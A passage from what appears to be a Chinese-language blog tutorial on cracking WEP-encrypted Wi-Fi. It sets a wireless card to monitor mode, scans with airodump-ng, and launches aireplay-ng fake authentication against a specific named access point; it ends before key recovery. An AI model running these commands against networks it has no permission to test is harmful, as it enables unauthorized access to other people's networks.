先說結論: WEP 加密方式一點都不可靠。
先把無線網卡設定為 monitor mode
1 | ~# ifconfig wlan0 down |
1 | ~# sudo airmon-ng start wlan0 *channel number* |
wifi 的 channel number 可以透過 inSSiDer 之類的軟體取得
1 | mon0 Unknown iwlwifi - [phy0] |
接著 ifconfig 會多出一張 mon0 的網卡
或者可以用下面指令檢查
1 | ~# sudo airmon-ng |
會出現:
1 | Interface Chipset Driver |
重點就是 mon* 網卡,之後 crack 都需要用到 mon 網卡。
1 | ~# sudo iwconfig mon0 channel **channel number** |
將 mon0 網卡的 channel 設定為指定的 channel number (其實就是要 crack 的 AP 所屬的 channel)
接著利用 airodump-ng 來掃描網路環境
1 | ~# sudo airodump-ng mon0 |
會出現下方類似的畫面
1 | CH -1 ][ Elapsed: 0 s ][ 2016-08-17 16:49 |
重點有
BSSID(Mac Address) / CH(channel) / ENC / CIPHER / ESSID(SSID)
先確認目標 ENC / CIPHER 是不是 WEP / WEP 是的話就先恭喜了,代表目標 AP 加密方式為 WEP。
接下來縮小範圍
1 | ~# sudo airodump-ng --channel 1 mon0 |
我們的目標是 00:0A:79:CC:0C:47 ndlib1
1 | sudo aireplay-ng --fakeauth 0 -a 00:0A:79:CC:0C:47 -e ndlib1 mon0 |
Reference
http://www.king-foo.com/2010/05/hacking-wep-encryption-on-ubuntu/
BT3 - iwconfig: device or resource busy
how to change channel